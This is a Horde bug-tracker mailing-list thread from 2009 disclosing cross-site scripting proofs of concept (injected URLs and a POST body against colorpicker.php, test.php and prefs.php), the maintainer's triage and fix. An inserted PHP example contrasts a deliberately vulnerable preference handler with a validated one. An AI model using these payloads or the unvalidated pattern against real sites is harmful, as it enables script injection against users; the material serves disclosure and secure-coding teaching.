[Tickets #8399] Multiple Cross Site Scripting Vulnerabilities
by bugs-14

DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/8399
------------------------------------------------------------------------------
 Ticket             | 8399
 Created By         | security@...
 Summary            | Multiple Cross Site Scripting Vulnerabilities
 Queue              | Horde Base
 Version            | 3.1
 Type               | Bug
 State              | Unconfirmed
 Priority           | 2. Medium
 Milestone          |
 Patch              |
 Owners             |
------------------------------------------------------------------------------
security@... (2009-07-03 14:48) wrote:

Multiple cross site scripting vulnerabilities exist. Proof of concepts:

http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>

https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["

https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>

POST to http://hordeserver.com/horde/services/prefs.php with the following content:

actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on

--
You are subscribed to this list as: lists@...
To unsubscribe, mail: bugs-unsubscribe@...
[Tickets #8399] Re: Number preferences are not validated properly
by bugs-14
Ticket URL: http://bugs.horde.org/ticket/8399
------------------------------------------------------------------------------
 Ticket             | 8399
 Updated By         | Chuck Hagenbuch <chuck@...>
-Summary            | Multiple Cross Site Scripting Vulnerabilities
+Summary            | Number preferences are not validated properly
 Queue              | Horde Base
-Version            | 3.1
+Version            | HEAD
 Type               | Bug
-State              | Unconfirmed
+State              | Assigned
 Priority           | 2. Medium
-Milestone          |
+Milestone          | 3.3.5
 Patch              |
-Owners             |
+Owners             | Horde Developers, Chuck Hagenbuch
------------------------------------------------------------------------------
Chuck Hagenbuch <chuck@...> (2009-07-11 17:08) wrote:

> Multiple cross site scripting vulnerabilities exist. Proof of concepts:

Horde 3.1 has been deprecated for a long time. The current stable version
is 3.3, and we backport serious security fixes to 3.2.

> http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
> https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["

This file doesn't exist in 3.2 or later.

> https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>

This was fixed almost 2 years ago, before 3.2.0:
http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9

> POST to http://hordeserver.com/horde/services/prefs.php with the
> following content:
> actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on

This I can actually reproduce as a problem. Patch forthcoming.
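The sidebar_width injection that the reply above confirms is reproducible, shown as an added example that is not part of the ticket and is not Horde's own code: a minimal PHP preferences handler that stores a preference declared as a number, first verbatim (the pattern the proof of concept abuses) and then with an integer check, and then emits it into a script block the way a page might. The function names (storePrefsUnvalidated, storePrefsValidated, renderSidebarScript, scriptInjected), the $numberPrefs table and its defaults are hypothetical; the POST body is the one from the first message, used here as constructed input.

```php
<?php
// Added example, not Horde's code. Demonstrates why a "number" preference
// has to be validated before it is stored: the stored value ends up inside
// a <script> block, where HTML escaping alone would not make it safe.
// All names below are hypothetical and do not match Horde's actual API.

// Constructed input: the POST body from the ticket's proof of concept.
$postBody = 'actionID=update_prefs&group=display&app=horde'
    . '&initial_application=horde&theme=azur&summary_refresh_time=0'
    . '&show_sidebar=on'
    . '&sidebar_width=1337//-->%0d%<script>alert(\'XSS\')</script>//'
    . '&menu_view=text&menu_refresh_time=0&widget_accesskey=on';
parse_str($postBody, $post);

// Preferences the (hypothetical) display group declares as numbers,
// keyed by name, with their default values.
$numberPrefs = [
    'sidebar_width'        => 200,
    'summary_refresh_time' => 0,
    'menu_refresh_time'    => 0,
];

// Vulnerable: whatever string was submitted is stored as the "number".
function storePrefsUnvalidated(array $post, array $numberPrefs): array
{
    $stored = $numberPrefs;
    foreach ($numberPrefs as $name => $default) {
        if (isset($post[$name])) {
            $stored[$name] = $post[$name];
        }
    }
    return $stored;
}

// Hardened: only an optional sign followed by digits is accepted. Anything
// else is rejected and the default is kept. \A and \z are used instead of
// ^ and $ because $ would still match "1337\n". The accepted value is cast
// to int so the stored type matches the declared one.
function storePrefsValidated(array $post, array $numberPrefs): array
{
    $stored = $numberPrefs;
    foreach ($numberPrefs as $name => $default) {
        if (!isset($post[$name])) {
            continue;
        }
        $raw = (string) $post[$name];
        if (preg_match('/\A-?[0-9]+\z/', $raw) !== 1) {
            // Rejected: keep the default. A real handler would also
            // report the invalid value back to the user.
            continue;
        }
        $stored[$name] = (int) $raw;
    }
    return $stored;
}

// The page writes the width straight into a JavaScript context. The only
// sound protection here is that the value is guaranteed to be a number
// before it reaches this point.
function renderSidebarScript(array $prefs): string
{
    return "<script type=\"text/javascript\">\n"
        . "var sidebarWidth = " . $prefs['sidebar_width'] . ";\n"
        . "</script>\n";
}

// Check used only for this demonstration: a second <script> tag in the
// rendered output means the submitted markup got through.
function scriptInjected(string $html): bool
{
    return substr_count(strtolower($html), '<script') > 1;
}

$unsafe = renderSidebarScript(storePrefsUnvalidated($post, $numberPrefs));
$safe   = renderSidebarScript(storePrefsValidated($post, $numberPrefs));

echo "--- unvalidated ---\n", $unsafe;
echo "injected: ", scriptInjected($unsafe) ? 'yes' : 'no', "\n\n";
echo "--- validated ---\n", $safe;
echo "injected: ", scriptInjected($safe) ? 'yes' : 'no', "\n";
```

Run it with the PHP command line interpreter. The unvalidated branch reproduces the proof of concept: the "//-->", carriage return and "<script>" from the form field land inside the page's script block unchanged. The validated branch rejects the value and renders the default, so the line reads "var sidebarWidth = 200;". Note that casting to int without the regex check would also have been enough to neutralise this particular payload, but it silently turns junk into 0 or 1337 instead of reporting it, which is why the check and the cast are both there.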
[Tickets #8399] Re: Number preferences are not validated properly
by bugs-14
Ticket URL: http://bugs.horde.org/ticket/8399
------------------------------------------------------------------------------
 Ticket             | 8399
 Updated By         | Chuck Hagenbuch <chuck@...>
 Summary            | Number preferences are not validated properly
 Queue              | Horde Base
 Version            | HEAD
 Type               | Bug
-State              | Assigned
+State              | Resolved
 Priority           | 2. Medium
 Milestone          | 3.3.5
 Patch              |
-Owners             | Horde Developers, Chuck Hagenbuch
+Owners             | Chuck Hagenbuch
------------------------------------------------------------------------------
Chuck Hagenbuch <chuck@...> (2009-07-11 19:40) wrote:

Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).